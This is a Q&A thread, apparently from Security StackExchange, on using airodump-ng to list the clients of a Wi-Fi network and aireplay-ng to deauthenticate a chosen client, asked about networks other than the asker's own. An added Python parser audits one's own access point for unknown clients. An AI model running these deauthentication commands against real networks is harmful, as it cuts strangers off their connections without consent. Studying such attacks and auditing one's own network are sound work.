
While using aireplay-ng, broadcast deauth requests are not working, but if I use deauth for a specific user it's working fine. But the problem is I don't know how to get the MAC address of a specific user. While trying on your own system it's easy: you can just check for your own MAC address. But how to get the MAC address of users on a different network? Is there any way to overcome this? Thank you for your time.

Spark
  • See my answer [how to return client's MAC Address](http://security.stackexchange.com/a/146458/118310) – defalt Dec 31 '16 at 08:06

1 Answer


If you are after just any user on that network, you can use airodump-ng on a specific BSSID. For example, running the command airodump-ng wlan0mon --bssid 00:00:00:00:00:AA --channel 1. Here is a sample output of the command:

 CH  1 ][ Elapsed: 10 s ][ 2016-12-31 12:00                              

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:00:00:00:00:AA  -59  93      112      698   69   1  54e  WPA2 CCMP   PSK  Network

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 00:00:00:00:00:AA  00:00:00:00:00:AB  -37    0e- 0e     0      696
 00:00:00:00:00:AA  00:00:00:00:00:AC  -47    0 - 1      0       24
 00:00:00:00:00:AA  00:00:00:00:00:AD  -66    0 - 1      0       52

As you can see, running the above command outputs the BSSID, as well as the devices connected to the BSSID (00:00:00:00:00:AB, 00:00:00:00:00:AC, and 00:00:00:00:00:AD). Now you can use the command aireplay-ng --deauth 0 -a 00:00:00:00:00:AA -c 00:00:00:00:00:AB wlan0mon to deauthenticate the specific client.

Make sure to substitute this example with your own WiFi card, BSSID MAC address, and channel number. The BSSID and channel you're after can be found by using airodump-ng wlan0mon, again using your WiFi card.

Gavin Youker
  • Thank you for your support. I was reading the documentation and I found this in short: to deauth use "aireplay-ng -0 0 -a mac -c mac wlan0". The field -c indicates the MAC address of a client to deauthenticate. So that's my question. How to list the clients connected to the network. I am somewhat experienced so you can go into details if you know – Spark Dec 31 '16 at 07:34
  • I have updated my answer to suit your needs. Using the command listed above should list the clients on that network (BSSID). Let me know if you need further information. – Gavin Youker Dec 31 '16 at 07:55
  • @Spark Did this answer your question? – Gavin Youker Dec 31 '16 at 23:52
  • This is nice. And this is exactly what I wanted. I haven't tested it yet but I'm sure I got what I needed. Connected devices bssid. Thank you for your support – Spark Jan 09 '17 at 15:21
  • @Spark I'm glad I could help! If my solution had answered your question be sure to mark it as the correct answer. – Gavin Youker Jan 09 '17 at 15:27
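
Added example, not part of the original answer or of the aircrack-ng project: a small Python parser for the airodump-ng STATION table shown in the answer, used to audit your own access point by flagging associated clients that are not on a list of devices you recognise. The function names and the allowlist are assumptions made for this illustration; the sample text is the answer's placeholder output.

```python
import re

MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"
# Station rows start with the AP's BSSID (or "(not associated)"), then the station MAC.
STATION_ROW = re.compile(rf"^\s*({MAC}|\(not associated\))\s+({MAC})\s+(-?\d+)\s")

# Sample screen output copied from the answer above (placeholder MACs).
SAMPLE = """\
 CH  1 ][ Elapsed: 10 s ][ 2016-12-31 12:00

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:00:00:00:00:AA  -59  93      112      698   69   1  54e  WPA2 CCMP   PSK  Network

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 00:00:00:00:00:AA  00:00:00:00:00:AB  -37    0e- 0e     0      696
 00:00:00:00:00:AA  00:00:00:00:00:AC  -47    0 - 1      0       24
 00:00:00:00:00:AA  00:00:00:00:00:AD  -66    0 - 1      0       52
"""

def parse_stations(text):
    """Return (bssid, station, power) for each row of the STATION table."""
    rows, in_stations = [], False
    for line in text.splitlines():
        if "STATION" in line.split():   # header of the second table
            in_stations = True
            continue
        m = STATION_ROW.match(line) if in_stations else None
        if m:
            rows.append((m.group(1).upper(), m.group(2).upper(), int(m.group(3))))
    return rows

def unknown_stations(text, bssid, allowlist):
    """Stations associated with `bssid` whose MAC is not in `allowlist`."""
    known = {mac.upper() for mac in allowlist}
    return [sta for ap, sta, _ in parse_stations(text)
            if ap == bssid.upper() and sta not in known]

if __name__ == "__main__":
    # Constructed allowlist: pretend only :AB and :AC are devices you own.
    mine = ["00:00:00:00:00:ab", "00:00:00:00:00:AC"]
    for mac in unknown_stations(SAMPLE, "00:00:00:00:00:AA", mine):
        print("unrecognised client:", mac)
```

A MAC allowlist is an inventory aid, not authentication: addresses can be spoofed, and phones using per-network private addresses appear under their randomized MAC.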